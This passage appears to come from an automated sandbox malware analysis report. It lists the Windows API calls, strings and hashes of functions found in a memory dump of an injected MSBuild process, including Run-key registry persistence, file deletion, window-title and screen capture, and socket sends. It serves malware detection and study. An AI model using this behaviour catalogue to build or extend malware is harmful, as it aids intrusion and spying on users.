                                                                                                • String ID: >G
                                                                                                • API String ID: 180926312-1296849874
                                                                                                • Opcode ID: e212d07a2fe9977d60ff8bf09592b6be22bd3f9dbe023fc5417e707efbc1d5b4
                                                                                                • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                • Opcode Fuzzy Hash: e212d07a2fe9977d60ff8bf09592b6be22bd3f9dbe023fc5417e707efbc1d5b4
                                                                                                • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                • RegDeleteValueW.KERNEL32(?,?,?,pth_unenc), ref: 00412998
                                                                                                Strings
                                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteOpenValue
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                • API String ID: 2654517830-1051519024
                                                                                                • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                APIs
                                                                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteDirectoryFileRemove
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 3325800564-4028850238
                                                                                                • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastMutex
                                                                                                • String ID: (CG
                                                                                                • API String ID: 1925916568-4210230975
                                                                                                • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                APIs
                                                                                                • GdiplusStartup.GDIPLUS(00473AF0,?,00000000,004747A8,?,00000000), ref: 00417909
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(0040466D,000000FF,00000000,?,?,00000000,?,0040466D,00000000,?,?), ref: 004047FD
                                                                                                  • Part of subcall function 004047EB: SetEvent.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404808
                                                                                                  • Part of subcall function 004047EB: CloseHandle.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404811
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventGdiplusHandleObjectSingleStartupWaitsend
                                                                                                • String ID: >G
                                                                                                • API String ID: 3841810518-1296849874
                                                                                                • Opcode ID: edebe519ac88750207000c47d4975838b45ea31ef42e9e40de8cba026d834f11
                                                                                                • Instruction ID: 6e8cec2321e62c70b23b2b74d4fb08bc055f8cc2cf122536797ace633d4d1ada
                                                                                                • Opcode Fuzzy Hash: edebe519ac88750207000c47d4975838b45ea31ef42e9e40de8cba026d834f11
                                                                                                • Instruction Fuzzy Hash: DF41A2713042005BC208FB61D8E2ABF7395ABD4348F10453FF54A572E2EF785A4AC69E
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _wcslen
                                                                                                • String ID: xAG
                                                                                                • API String ID: 176396367-2759412365
                                                                                                • Opcode ID: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                                • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                                • Opcode Fuzzy Hash: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                                • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                                APIs
                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A924
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: GlobalMemoryStatus
                                                                                                • String ID: @
                                                                                                • API String ID: 1890195054-2766056989
                                                                                                • Opcode ID: 77c01509f09c1c0ea002472fadf5a7bfc2a0d860c4387955b9c5324222a914e1
                                                                                                • Instruction ID: 55a0b46ba8cbe677e5d154749259a9ff5c7a888a6026538c4a1932b43fc14a6f
                                                                                                • Opcode Fuzzy Hash: 77c01509f09c1c0ea002472fadf5a7bfc2a0d860c4387955b9c5324222a914e1
                                                                                                • Instruction Fuzzy Hash: 00E0C9B5901228EBCB10DFA9E94498DFBF8FF48654B008126E905B3345D370E805CB90
                                                                                                APIs
                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: GlobalMemoryStatus
                                                                                                • String ID: @
                                                                                                • API String ID: 1890195054-2766056989
                                                                                                • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                APIs
                                                                                                • GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FromGdipImageLoadStream
                                                                                                • String ID: swA
                                                                                                • API String ID: 3292405956-3360919852
                                                                                                • Opcode ID: d32091d8e9103a326d377bf0fe5bab6a71d21159bb4dc6250b7940f8291467a3
                                                                                                • Instruction ID: 2a886c12d0b13c002f87105889f80db31f83d75bccf9dc3bcfdd738cf486424e
                                                                                                • Opcode Fuzzy Hash: d32091d8e9103a326d377bf0fe5bab6a71d21159bb4dc6250b7940f8291467a3
                                                                                                • Instruction Fuzzy Hash: 69D0C9725047109FC3619F04EC40A92BBE8EB15712F11C82FA89AC2620E3B4AC448BA4
                                                                                                APIs
                                                                                                • GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DisposeGdipImage
                                                                                                • String ID: swA
                                                                                                • API String ID: 1024088383-3360919852
                                                                                                • Opcode ID: 53d02a7cdc31564afcf08cdd77fcdae3b4280dc9da9913a0847c3ab8625b2a6f
                                                                                                • Instruction ID: 212e07d5799bb9a24d17fec7de07d61041a30ae78413593dc916522769f6e6c6
                                                                                                • Opcode Fuzzy Hash: 53d02a7cdc31564afcf08cdd77fcdae3b4280dc9da9913a0847c3ab8625b2a6f
                                                                                                • Instruction Fuzzy Hash: DCA01130800202CF8F022F20AE080003EA0EB0230A320C0A8800888232E333C802CA8A
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0044B9DF
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap$_free
                                                                                                • String ID:
                                                                                                • API String ID: 1482568997-0
                                                                                                • Opcode ID: 4aeba00e3fff788b378028bf06d7bcfcb791a64fa1e6dc072cb532da7a87caba
                                                                                                • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                                • Opcode Fuzzy Hash: 4aeba00e3fff788b378028bf06d7bcfcb791a64fa1e6dc072cb532da7a87caba
                                                                                                • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                                APIs
                                                                                                • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                  • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEventStartupsocket
                                                                                                • String ID:
                                                                                                • API String ID: 1953588214-0
                                                                                                • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                  • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3476068407-0
                                                                                                • Opcode ID: 30b622fd39dfe81e016544b816676d4fdb2bf9eeff9443c40b7b6911b9045d4b
                                                                                                • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                • Opcode Fuzzy Hash: 30b622fd39dfe81e016544b816676d4fdb2bf9eeff9443c40b7b6911b9045d4b
                                                                                                • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ForegroundText
                                                                                                • String ID:
                                                                                                • API String ID: 29597999-0
                                                                                                • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                                • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                                APIs
                                                                                                • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                  • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                  • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                  • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                  • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                  • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                • String ID:
                                                                                                • API String ID: 1170566393-0
                                                                                                • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                                • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                APIs
                                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Startup
                                                                                                • String ID:
                                                                                                • API String ID: 724789610-0
                                                                                                • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                APIs
                                                                                                • GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: GdipImageSaveStream
                                                                                                • String ID:
                                                                                                • API String ID: 971487142-0
                                                                                                • Opcode ID: dd4c19a778b4d9c0263e5c3de670e2f7a4c391227e23d672982bbc2967106854
                                                                                                • Instruction ID: c152069da62037acbb56f4ff16b46c421b53e2f7b92aafa5ca67a7c3543cc58a
                                                                                                • Opcode Fuzzy Hash: dd4c19a778b4d9c0263e5c3de670e2f7a4c391227e23d672982bbc2967106854
                                                                                                • Instruction Fuzzy Hash: AEC01232008351AF8B12EF40EC49C6FBFA6FF88710F040C1DF16541130C7219865DB55
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000045C6,004748F8,00000000,00000000), ref: 004045BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 2422867632-0
                                                                                                • Opcode ID: f44f3784240fcd8d7e72620cae152613109fcde0c1516d85c672c4a39e57bca1
                                                                                                • Instruction ID: 01210324b7e8a077b404d8502847c02a9d9eadc8fda39bfa96d67c8057efca6e
                                                                                                • Opcode Fuzzy Hash: f44f3784240fcd8d7e72620cae152613109fcde0c1516d85c672c4a39e57bca1
                                                                                                • Instruction Fuzzy Hash: 9FC048F1A24200BFA610CF20DD49C37B6ECEB90741B21897ABE08D2141E275DD02CA39
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: send
                                                                                                • String ID:
                                                                                                • API String ID: 2809346765-0
                                                                                                • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Deallocate
                                                                                                • String ID:
                                                                                                • API String ID: 1075933841-0
                                                                                                • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
